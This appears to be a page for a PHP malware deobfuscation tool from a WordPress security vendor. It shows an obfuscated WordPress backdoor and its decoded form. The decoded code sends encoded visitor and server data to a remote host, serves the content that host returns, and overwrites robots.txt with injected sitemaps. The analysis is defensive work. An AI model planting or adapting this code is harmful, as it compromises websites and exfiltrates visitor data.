Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
//Obfuscate by https://uutool.cn/php/
goto enCvG; C_JUV: goto zx_xN; goto Xg52s; Ye41A: array_pop($z485R); goto Vxmvo; PPv50: $OA8Gc = "\x74\x69\157\x6e\56\143\157\x6d"; goto D1jNm; nzfwB: bPfPw: goto cGjKq; bxgj2: uNMFd: goto b2S9d; tQjMo: curl_setopt($TSiXl, CURLOPT_RETURNTRANSFER, 1); goto b9h2t; kDXjJ: goto I6ohq; goto KKU_2; veuT7: F5Ygz: goto AooOt; u4QaJ: goto bPfPw; goto BXJJb; PyAlp: KNidB: goto W7KkC; EbVAN: RsGwV: goto QAiQy; P8FRV: r8K4_: goto rnRKE; BFGEM: $zXsfs = trim($zXsfs); goto qyi_V; IU913: goto ohRRy; goto pMTR3; buv1E: EtGm7: goto T2689; okXCQ: $LRR5H = trim($dABvC[$n777L - 1]); goto YMihx; RHLQW: wJLFh: goto u4QaJ; TW9SD: lQMQ6: goto XRZfG; VaGlr: $Fqomp = trim($dABvC[1]); goto K9jwc; ZgHey: goto WnqUd; goto nQVpR; AooOt: echo $Fqomp; goto Vdh2n; O1ICT: eAK3s: goto pt_Xk; XctHi: $BgbK7 .= "\x41\154\x6c\157\167\72\57" . PHP_EOL; goto IeM0v; v9VH5: hES84: goto ugvB6; kvbQs: goto NYuJ3; goto T2MPO; dVnHd: hXU8l: goto HTdOe; e5f_I: yL3fT: goto je0Wq; W7KkC: $J1z7I = array("\123\x43\x52\x49\120\124\137\x4e\101\x4d\105", "\x52\105\x51\x55\x45\123\124\137\125\122\111", "\x48\x54\x54\x50\123", "\x52\105\121\x55\x45\x53\x54\137\123\103\x48\105\115\x45", "\123\105\122\x56\105\122\x5f\120\117\x52\x54", "\x52\105\115\117\x54\105\137\101\x44\104\x52", "\x48\124\x54\120\x5f\122\105\x46\105\122\105\x52", "\110\124\x54\x50\137\x41\103\103\x45\x50\124\x5f\x4c\101\x4e\x47\x55\x41\x47\105", "\110\x54\x54\120\137\125\x53\105\122\137\101\x47\105\x4e\x54", "\110\124\124\120\137\110\117\123\x54"); goto Jyvj_; KAptM: $Mj7s8 = "\x68\x74\164\x70\x3a\x2f\57" . $U229z . $MRjhJ . $trDo7 . $OA8Gc; goto cdHR0; X6JTF: uUULS: goto DzsLj; do5m9: dm66x: goto ky_MU; je0Wq: $p_7Oi = "\x61\x6b\61"; goto kvbQs; peOdr: poCe1: goto pjTB4; riIWB: $A2rQP = "\156\164\x73"; goto EElWN; DaeGT: error_reporting(0); goto zn9ST; WCYP2: $Vf0pK = "\x65\164\x5f\x63"; goto C_JUV; AeQl0: goto nf7BP; goto DrjxH; cGjKq: header($I8mBr); goto LHPoU; upgpD: NYuJ3: goto Hy81N; mgwNB: goto iLl0K; goto IT1fS; XRZfG: $I8mBr = trim($dABvC[0]); goto eLKZy; AHSR5: exit; goto C9J7j; NMWMw: goto NJlOm; goto upgpD; pQllK: goto ZTDIr; goto GTIKV; ivtE5: FKjks: goto j4jR1; u3ROD: if (!empty($I8mBr)) { goto wJLFh; } goto oIMd1; Nfd3I: goto EukN8; goto buv1E; BXJJb: I6ohq: goto h5fSE; Vxmvo: goto TKq2Q; goto DHImO; MXH6p: goto Ffqke; goto xSn2l; CFnFR: goto ErHGo; goto PyAlp; bk7I7: goto hXU8l; goto KY_09; iX2qA: goto o8mhb; goto fkjpm; KY_09: iNfpc: goto PPv50; sjJ8B: KZDcl: goto AHSR5; UEDdK: foreach ($z485R as $Hggyu) { goto kQHda; Z27gK: dXoIn: goto qdVpF; OCmAg: Pl0sH: goto Z27gK; kQHda: $BgbK7 .= "\x53\x69\x74\x65\x6d\141\x70\72" . $Hggyu . PHP_EOL; goto OCmAg; qdVpF: } goto jqGct; LxCr9: if ($LRR5H == "\x70\151\156\x67") { goto wOv0Y; } goto vh9R8; eX20Q: ErHGo: goto yAsFE; rSM7v: wOv0Y: goto BmzxG; AK9jL: R0Reo: goto Mj1nR; cTtLM: nf7BP: goto fvkni; xtVtC: goto d0JYn; goto bxgj2; LEE1n: curl_setopt($TSiXl, CURLOPT_CONNECTTIMEOUT, 10); goto BjwWS; jqGct: f_gOd: goto wS1BL; enCvG: goto uKe14; goto uTOvk; dT0v9: ZaHg_: goto wbCJw; EQPLN: $X0ayU = "\57\x69\x6e\x64\145\170\56\160\x68\x70\x3f\126\123\75" . $p_7Oi . "\x26\x47\x50\75" . $U229z; goto X9ipu; c21dP: l2rUF: goto BuMdS; dH46X: d8MX8: goto bLxYv; Tlr0x: bq0jJ: goto lV0Yt; Zdbgh: PPEDF: goto DCqZN; vh9R8: goto uUULS; goto rSM7v; wS1BL: goto x_Rcv; goto dVnHd; eLKZy: goto mafC1; goto JCgPp; Mj1nR: $U229z = "\x7a\x6a\x32\61\71\x36"; goto MJsah; fOxoR: A583t: goto Jq5CE; V161o: iyzAp: goto b3LL1; kYhXg: goto PPEDF; goto ZW_j1; l9EtJ: qtstP: goto kv9FR; DrjxH: WnqUd: goto GiiKK; O9cWl: irOnV: goto WCYP2; xSn2l: MJJbE: goto dH46X; kVfDl: BNp7B: goto KZnx_; xUbUP: ZTDIr: goto BFGEM; Jq5CE: if (preg_match("\x2f\x6a\160\x32\60\x32\x33\143\x77\167\57\163\151", $_SERVER["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\122\111"]) == 0) { goto wOz7t; } goto Lhez3; X9ipu: goto KNidB; goto NEA2f; b2S9d: YDBqH: goto npvRD; k9qi1: if (!empty($Fqomp)) { goto poCe1; } goto YP6dl; WuFiK: B9fC7: goto ZgHey; asGE5: $gfmao = "\157\x6e\x74\145"; goto kdNH1; n9t3V: EyDnu: goto Vnc3S; RR7Sr: exit; goto oZlcV; jlTuo: bETAA: goto eMqqI; GAtm9: goto I6lTL; goto iKY2m; q9tOH: xd4ZR: goto obokG; H54WQ: leSxy: goto jlTuo; DCqZN: curl_close($TSiXl); goto AeQl0; xKYZ0: $trDo7 = "\x70\141\x63"; goto pvNsl; gIQyP: goto eAK3s; goto kVfDl; YUdc9: goto ZaHg_; goto V4HFm; vMDLo: goto A583t; goto AK9jL; HWz4s: if ($LRR5H == "\x65\170\x69\164") { goto ndKHJ; } goto UmFSJ; gdTPE: LiaK7: goto X0Th2; s2RBr: foreach ($J1z7I as $jEpVA) { goto js8Hj; pN6cU: $gfiKN = str_replace("\x2f", "\137", $gfiKN); goto UpZGh; i3tlR: goto RAN9x; goto opyiS; hsuOP: if (!($jEpVA == "\x52\x45\x4d\117\x54\105\x5f\101\x44\104\122")) { goto Tz6fL; } goto Zt_3m; YHXS7: QxQy5: goto i3tlR; BePaM: WJaSF: goto T06eC; pUJOV: goto R5CHJ; goto pn79m; UpZGh: goto WJaSF; goto asHjg; T06eC: $gfiKN = str_replace("\75", "\56", $gfiKN); goto pUJOV; zGhox: $gfiKN = base64_encode(trim($a4dbi)); goto TTQR9; Nnw3Q: XbID2: goto iNZ9E; rDPwL: goto WR50w; goto ATejH; U0qgf: $a4dbi = isset($_SERVER[$jEpVA]) ? $_SERVER[$jEpVA] : ''; goto HZBMV; YDYyD: goto mGqBR; goto BePaM; xMSbL: $X0ayU .= "\46" . $jEpVA . "\75" . $gfiKN; goto rDPwL; CJHPD: WR50w: goto PcqrL; PcqrL: zvyZ7: goto IfgQO; i4ZCo: goto nFX4y; goto CJHPD; oSE3e: $gfiKN = str_replace("\x2b", "\55", $gfiKN); goto i4ZCo; HdFXu: G8YsR: goto U0qgf; LzTjf: f2i5k: goto YHXS7; MfVby: nFX4y: goto pN6cU; TTQR9: goto JThdn; goto eBxpj; hPsGe: npNNq: goto UYhdf; p86bA: $a4dbi = isset($_SERVER["\x48\124\124\120\x5f\x58\137\x46\x4f\122\x57\101\x52\x44\x45\x44\137\106\117\122"]) ? $_SERVER["\110\x54\x54\120\x5f\x58\137\x46\x4f\122\127\101\122\x44\x45\104\137\106\x4f\122"] : (isset($_SERVER["\x52\x45\115\x4f\124\105\137\x41\x44\x44\122"]) ? $_SERVER["\x52\x45\115\117\x54\105\137\x41\104\104\x52"] : ''); goto vZaKU; IfgQO: goto npNNq; goto hPsGe; fhkx9: b7dLN: goto TgrKy; vZaKU: goto f2i5k; goto MfVby; HZBMV: goto XbID2; goto LzTjf; St1EC: mGqBR: goto fhkx9; TgrKy: goto GVIh7; goto Nnw3Q; js8Hj: goto uP7WQ; goto HdFXu; ATejH: GVIh7: goto p86bA; asHjg: JThdn: goto oSE3e; pIB3v: Tz6fL: goto aiE2U; aiE2U: goto G8YsR; goto St1EC; UYhdf: N3HtR: goto LVwvV; iNZ9E: goto QxQy5; goto YDYyD; eBxpj: R5CHJ: goto xMSbL; Zt_3m: goto b7dLN; goto pIB3v; pn79m: RAN9x: goto zGhox; opyiS: uP7WQ: goto hsuOP; LVwvV: } goto BPXcF; WCr3b: mBprq: goto KAptM; yAsFE: $TSiXl = curl_init(); goto naeE1; bLxYv: goto FKjks; goto smFGk; oZlcV: goto YKmI7; goto xUbUP; Ndt99: NJlOm: goto VaGlr; V4HFm: rQ6xu: goto LxCr9; YMihx: goto wuwUy; goto eX20Q; hjlvF: goto x6gL2; goto fOxoR; EElWN: goto xd4ZR; goto nzfwB; qyi_V: goto tHpj7; goto YfZBK; uTOvk: TKq2Q: goto UEDdK; srQtR: $BgbK7 = "\125\163\x65\x72\x2d\x61\147\x65\x6e\164\72\52" . PHP_EOL; goto IU913; T2MPO: ohRRy: goto XctHi; oz8RS: goto hES84; goto lu1W_; UmFSJ: goto YDBqH; goto RzxEZ; Vdh2n: goto XvoHd; goto e5f_I; YnoHw: I6lTL: goto tQjMo; gzDCk: goto r8K4_; goto YnoHw; pX9Jw: R0Tku: goto srQtR; YP6dl: goto qtstP; goto peOdr; pDskq: curl_setopt($TSiXl, CURLOPT_URL, $qZjaC); goto GAtm9; NEA2f: d0JYn: goto CCFzp; rnRKE: $n777L = count($dABvC); goto oz8RS; JCgPp: ooEoV: goto RR7Sr; smFGk: uKe14: goto DaeGT; CCFzp: exit; goto MXH6p; kdNH1: goto h1a51; goto v9VH5; WkbdB: $V3tZc = "\x65\137\x67"; goto cOjKf; n3SnY: goto MJJbE; goto TW9SD; bNym0: wuwUy: goto HWz4s; BuMdS: header("\x48\124\124\x50\57\x31\56\60\40\64\60\x34\40\116\x6f\164\40\x46\x6f\165\x6e\x64"); goto n3SnY; nQVpR: YKmI7: goto X6JTF; HGbHk: goto zta1C; goto bH_uA; lxhRJ: goto EyDnu; goto O1ICT; ky_MU: goto xVD2H; goto hs3NX; YfZBK: h1a51: goto riIWB; jqV49: goto EnxEX; goto dT0v9; Hy81N: if (preg_match("\57\x6a\x70\x32\x30\62\x33\57\x73\x69", $_SERVER["\122\105\121\x55\105\x53\x54\137\125\122\x49"]) == 1) { goto q7BPo; } goto BQw3E; DzsLj: goto BNp7B; goto n9t3V; S5sdH: Q8Dat: goto vFAdy; u2FDK: goto ooEoV; goto ivtE5; wljFx: $zXsfs = $H728n($qZjaC); goto iX2qA; WpFY3: goto KZDcl; goto EbVAN; D1jNm: goto mBprq; goto bNym0; DHImO: IvF__: goto s2RBr; HTdOe: exit; goto Dxu9h; lj01G: zx_xN: goto asGE5; hs3NX: EnxEX: goto WkbdB; K9jwc: goto VUADW; goto S5sdH; gEdot: goto TMuTf; goto V161o; GTIKV: Bv6aV: goto okXCQ; BjwWS: goto zKpn1; goto Tlr0x; fkjpm: zKpn1: goto WFKia; RzxEZ: ndKHJ: goto WpFY3; lu1W_: Ovjd4: goto EQPLN; Vnc3S: fclose($aqKD7); goto mgwNB; QNAHn: goto nK1N9; goto gdTPE; IeM0v: goto w65rn; goto c21dP; SrEZ5: TMuTf: goto xKYZ0; JrX5a: q7BPo: goto vMDLo; yTYIp: goto XkWLW; goto sjJ8B; h5fSE: nK1N9: goto XGn06; Jyvj_: goto IvF__; goto JKtQp; BPXcF: i8wGU: goto HGbHk; O_SN3: goto bq0jJ; goto lj01G; zn9ST: goto R0Reo; goto veuT7; GiiKK: $qZjaC = $Mj7s8 . $X0ayU; goto CFnFR; CRaYr: tHpj7: goto IUicy; obokG: $H728n = $Y_8F9 . $V3tZc . $Vf0pK . $gfmao . $A2rQP; goto yTYIp; KynZ9: goto l2rUF; goto L2079; j4jR1: echo "\110\124\124\120\57\x31\x2e\x30\40\x34\x30\x34\40\116\157\164\x20\x46\157\x75\156\x64\x5f\137\137" . $U229z . "\x5f\x5f\x5f" . $p_7Oi; goto xtVtC; WFKia: $zXsfs = curl_exec($TSiXl); goto O_SN3; C9J7j: goto uNMFd; goto Zdbgh; b3LL1: ldNFU: goto NMWMw; pjTB4: goto F5Ygz; goto WCr3b; KZnx_: goto bETAA; goto kDXjJ; cOjKf: goto irOnV; goto P8FRV; BQw3E: goto nMtzs; goto JrX5a; Xg52s: o8mhb: goto xCfpl; pvNsl: goto iNfpc; goto LXe8d; QAiQy: $Y_8F9 = "\x66\151\x6c"; goto jqV49; BmzxG: goto R0Tku; goto O9cWl; L2079: ZoGNX: goto LEE1n; JKtQp: iLl0K: goto r3Xe_; pt_Xk: $MRjhJ = "\56\x77\141"; goto gEdot; gawhm: xVD2H: goto I8UOV; LXe8d: VUADW: goto k9qi1; iKY2m: w65rn: goto uGiMm; KKU_2: mafC1: goto u3ROD; Lhez3: goto d8MX8; goto bDhZj; Dxu9h: goto leSxy; goto G1lnX; IT1fS: x_Rcv: goto do5m9; vFAdy: header("\110\124\124\120\57\x31\x2e\x30\40\x34\60\x34\40\x4e\x6f\164\40\106\157\x75\x6e\144"); goto bk7I7; b9h2t: goto ZoGNX; goto cTtLM; eMqqI: define("\x50\67\x63\x48\111", true); goto WC5Q5; mQJ1u: Ffqke: goto IY1XV; ZW_j1: XkWLW: goto wljFx; X0Th2: goto lQMQ6; goto Ndt99; wbCJw: fwrite($aqKD7, $BgbK7); goto lxhRJ; bH_uA: T_Ykl: goto pDskq; LtlOl: x6gL2: goto Ye41A; I8UOV: $aqKD7 = fopen($_SERVER["\x44\x4f\103\x55\115\x45\116\124\137\122\117\x4f\124"] . "\57\x72\157\142\157\x74\163\x2e\x74\170\x74", "\x77"); goto YUdc9; uGiMm: $z485R = explode("\x3c\142\x72\57\x3e", $Fqomp); goto hjlvF; ugvB6: if (!($n777L < 3)) { goto LiaK7; } goto QNAHn; fvkni: if (empty($zXsfs)) { goto EtGm7; } goto Nfd3I; IY1XV: nMtzs: goto gIQyP; oIMd1: goto ldNFU; goto RHLQW; G1lnX: zta1C: goto WuFiK; lV0Yt: $zXsfs = trim($zXsfs); goto kYhXg; naeE1: goto T_Ykl; goto CRaYr; xCfpl: EukN8: goto pQllK; r3Xe_: echo "\x72\x6f\142\x6f\164\163\56\164\170\164\x20\144\157\x6e\145"; goto u2FDK; LHPoU: goto iyzAp; goto gawhm; bDhZj: wOz7t: goto KynZ9; T2689: goto RsGwV; goto LtlOl; cdHR0: goto Ovjd4; goto mQJ1u; IUicy: $dABvC = explode("\x7c\x40\43\44\174", $zXsfs); goto gzDCk; pMTR3: XvoHd: goto l9EtJ; kv9FR: goto Bv6aV; goto q9tOH; npvRD: goto rQ6xu; goto H54WQ; MJsah: goto yL3fT; goto SrEZ5; XGn06: goto Q8Dat; goto pX9Jw; WC5Q5: require __DIR__ . "\57\x77\160\55\x62\x6c\157\147\x2d\150\145\141\x64\x65\162\x2e\x70\150\x70";<?php
error_reporting(0);
$U229z = "zj2196";
$p_7Oi = "ak1";
if (preg_match("/jp2023/si", $_SERVER["REQUEST_URI"]) == 1) {
if (preg_match("/jp2023cww/si", $_SERVER["REQUEST_URI"]) == 0) {
header("HTTP/1.0 404 Not Found");
goto dH46X;
}
dH46X:
echo "HTTP/1.0 404 Not Found___" . $U229z . "___" . $p_7Oi;
exit;
}
IY1XV:
$MRjhJ = ".wa";
$trDo7 = "pac";
$OA8Gc = "tion.com";
$Mj7s8 = "http://" . $U229z . $MRjhJ . $trDo7 . $OA8Gc;
$X0ayU = "/index.php?VS=" . $p_7Oi . "&GP=" . $U229z;
$J1z7I = array("SCRIPT_NAME", "REQUEST_URI", "HTTPS", "REQUEST_SCHEME", "SERVER_PORT", "REMOTE_ADDR", "HTTP_REFERER", "HTTP_ACCEPT_LANGUAGE", "HTTP_USER_AGENT", "HTTP_HOST");
foreach ($J1z7I as $jEpVA) {
if (!($jEpVA == "REMOTE_ADDR")) {
$a4dbi = isset($_SERVER[$jEpVA]) ? $_SERVER[$jEpVA] : '';
goto QxQy5;
}
fhkx9:
$a4dbi = isset($_SERVER["HTTP_X_FORWARDED_FOR"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : '');
QxQy5:
$gfiKN = base64_encode(trim($a4dbi));
$gfiKN = str_replace("+", "-", $gfiKN);
$gfiKN = str_replace("/", "_", $gfiKN);
$gfiKN = str_replace("=", ".", $gfiKN);
$X0ayU .= "&" . $jEpVA . "=" . $gfiKN;
}
$qZjaC = $Mj7s8 . $X0ayU;
$TSiXl = curl_init();
curl_setopt($TSiXl, CURLOPT_URL, $qZjaC);
curl_setopt($TSiXl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($TSiXl, CURLOPT_CONNECTTIMEOUT, 10);
$zXsfs = curl_exec($TSiXl);
$zXsfs = trim($zXsfs);
curl_close($TSiXl);
if (empty($zXsfs)) {
$Y_8F9 = "fil";
$V3tZc = "e_g";
$Vf0pK = "et_c";
$gfmao = "onte";
$A2rQP = "nts";
$H728n = "file_get_contents";
$zXsfs = file_get_contents($qZjaC);
goto xCfpl;
}
xCfpl:
$zXsfs = trim($zXsfs);
$dABvC = explode("|@#\$|", $zXsfs);
$n777L = count($dABvC);
if (!($n777L < 3)) {
$I8mBr = trim($dABvC[0]);
if (!empty($I8mBr)) {
header($I8mBr);
goto b3LL1;
}
b3LL1:
$Fqomp = trim($dABvC[1]);
if (!empty($Fqomp)) {
echo $Fqomp;
goto l9EtJ;
}
l9EtJ:
$LRR5H = trim($dABvC[$n777L - 1]);
if ($LRR5H == "exit") {
exit;
}
b2S9d:
if ($LRR5H == "ping") {
$BgbK7 = "User-agent:*PHP_EOL";
$BgbK7 = "User-agent:*PHP_EOLAllow:/PHP_EOL";
$z485R = explode("<br/>", $Fqomp);
array_pop($z485R);
foreach ($z485R as $Hggyu) {
$BgbK7 .= "Sitemap:" . $Hggyu . PHP_EOL;
}
$aqKD7 = fopen($_SERVER["DOCUMENT_ROOT"] . "/robots.txt", "w");
fwrite($aqKD7, $BgbK7);
fclose($aqKD7);
echo "robots.txt done";
exit;
}
X6JTF:
jlTuo:
define("P7cHI", true);
require "/var/www/html/wp-blog-header.php";
// [PHPDeobfuscator] Implied script end
return;
}
h5fSE:
header("HTTP/1.0 404 Not Found");
exit;Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.